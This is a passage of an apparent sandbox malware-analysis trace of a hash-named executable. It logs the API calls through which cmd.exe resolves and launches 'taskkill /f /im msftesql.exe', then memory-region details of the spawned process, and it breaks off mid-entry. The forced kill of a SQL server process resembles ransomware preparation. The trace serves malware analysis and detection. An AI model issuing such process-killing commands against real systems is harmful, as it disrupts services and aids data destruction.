(_String1="taskkill", _String2="DATE") returned 16 [0125.613] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0125.613] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0125.613] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0125.613] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0125.613] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0125.613] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0125.613] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0125.613] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0125.613] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0125.613] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0125.613] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0125.613] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0125.613] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0125.613] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0125.613] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0125.613] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0125.613] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0125.613] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0125.613] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0125.613] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0125.614] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0125.614] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0125.614] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0125.614] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0125.614] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0125.614] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0125.614] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0125.614] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0125.614] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0125.614] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0125.614] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0125.614] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0125.614] GetProcessHeap () returned 0x690000 [0125.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x69ad58 [0125.615] GetProcessHeap () returned 0x690000 [0125.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x46) returned 0x69af70 [0125.615] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0125.615] GetProcessHeap () returned 0x690000 [0125.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6905c8 [0125.615] SetErrorMode (uMode=0x0) returned 0x8003 [0125.615] SetErrorMode (uMode=0x1) returned 0x0 [0125.615] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0125.616] SetErrorMode (uMode=0x8003) returned 0x1 [0125.616] GetProcessHeap () returned 0x690000 [0125.616] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6905c8, Size=0x56) returned 0x6905c8 [0125.616] GetProcessHeap () returned 0x690000 [0125.616] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6905c8) returned 0x56 [0125.616] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0125.616] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0125.616] GetProcessHeap () returned 0x690000 [0125.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x110) returned 0x69afc0 [0125.616] GetProcessHeap () returned 0x690000 [0125.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x218) returned 0x690628 [0125.623] GetProcessHeap () returned 0x690000 [0125.623] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x690628, Size=0x112) returned 0x690628 [0125.623] GetProcessHeap () returned 0x690000 [0125.623] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x690628) returned 0x112 [0125.623] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0125.623] GetProcessHeap () returned 0x690000 [0125.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x69b0d8 [0125.626] GetProcessHeap () returned 0x690000 [0125.626] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69b0d8, Size=0x76) returned 0x69b0d8 [0125.626] GetProcessHeap () returned 0x690000 [0125.626] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69b0d8) returned 0x76 [0125.626] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.626] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0125.627] GetLastError () returned 0x2 [0125.627] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.627] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x69b158 [0125.627] GetProcessHeap () returned 0x690000 [0125.627] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x6979a0 [0125.627] FindClose (in: hFindFile=0x69b158 | out: hFindFile=0x69b158) returned 1 [0125.628] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0125.628] GetLastError () returned 0x2 [0125.628] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x69b158 [0125.629] GetProcessHeap () returned 0x690000 [0125.629] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6979a0, Size=0x4) returned 0x697e90 [0125.629] FindClose (in: hFindFile=0x69b158 | out: hFindFile=0x69b158) returned 1 [0125.629] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0125.629] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0125.629] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0125.632] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0125.632] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0125.632] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0125.632] GetProcessHeap () returned 0x690000 [0125.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x18) returned 0x697640 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.632] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.633] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.634] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0125.634] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.634] GetProcessHeap () returned 0x690000 [0125.634] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697640) returned 1 [0125.634] GetProcessHeap () returned 0x690000 [0125.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa) returned 0x697ea0 [0125.634] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0125.638] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im msftesql.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im msftesql.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im msftesql.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xb9c, dwThreadId=0x9a8)) returned 1 [0126.086] CloseHandle (hObject=0x98) returned 1 [0126.086] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.086] GetProcessHeap () returned 0x690000 [0126.087] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x699e60) returned 1 [0126.087] GetEnvironmentStringsW () returned 0x699e60* [0126.087] GetProcessHeap () returned 0x690000 [0126.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa76) returned 0x697fe8 [0126.087] FreeEnvironmentStringsA (penv="=") returned 1 [0126.087] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0139.432] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0139.432] CloseHandle (hObject=0x9c) returned 1 [0139.433] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0139.434] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0139.434] GetProcessHeap () returned 0x690000 [0139.435] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697fe8) returned 1 [0139.443] GetEnvironmentStringsW () returned 0x69b2a0* [0139.443] GetProcessHeap () returned 0x690000 [0139.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa9c) returned 0x697fe8 [0139.443] FreeEnvironmentStringsA (penv="=") returned 1 [0139.444] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0139.444] GetProcessHeap () returned 0x690000 [0139.444] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697fe8) returned 1 [0139.444] GetEnvironmentStringsW () returned 0x69b2a0* [0139.444] GetProcessHeap () returned 0x690000 [0139.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa9c) returned 0x697fe8 [0139.444] FreeEnvironmentStringsA (penv="=") returned 1 [0139.444] GetProcessHeap () returned 0x690000 [0139.444] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697ea0) returned 1 [0139.445] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0139.445] _get_osfhandle (_FileHandle=1) returned 0x140 [0139.445] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0139.445] _get_osfhandle (_FileHandle=1) returned 0x140 [0139.445] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0139.445] _get_osfhandle (_FileHandle=0) returned 0x13c [0139.445] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0139.445] GetConsoleOutputCP () returned 0x1b5 [0139.448] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0139.448] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.452] exit (_Code=128) Thread: id = 12 os_tid = 0xd98 Process: id = "4" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0xe5b000" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xeac" cmd_line = "taskkill /f /im msftesql.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 451 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 452 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 453 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 454 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 455 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 456 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 457 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 458 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 459 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 460 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 461 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 462 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 463 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 464 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 465 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 466 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 467 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 468 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 469 start_va = 0x4190000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 470 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 471 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 472 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 473 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 474 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 475 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 476 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 477 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 478 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 479 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 480 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 481 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 482 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 483 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 484 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 485 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 486 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 487 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 488 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 489 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 490 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 491 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 492 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 493 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 494 start_va = 0x44c0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 495 start_va = 0x4600000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 496 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 497 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 498 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 499 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 500 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 501 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 502 start_va = 0x6c820000 end_va = 0x6c95efff monitored = 0 entry_point = 0x6c84d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 503 start_va = 0x4640000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 504 start_va = 0x4680000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 505 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 506 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 507 start_va = 0x46c0000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 508 start_va = 0x46c0000 end_va = 0x46e9fff monitored = 0 entry_point = 0x46c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 509 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = 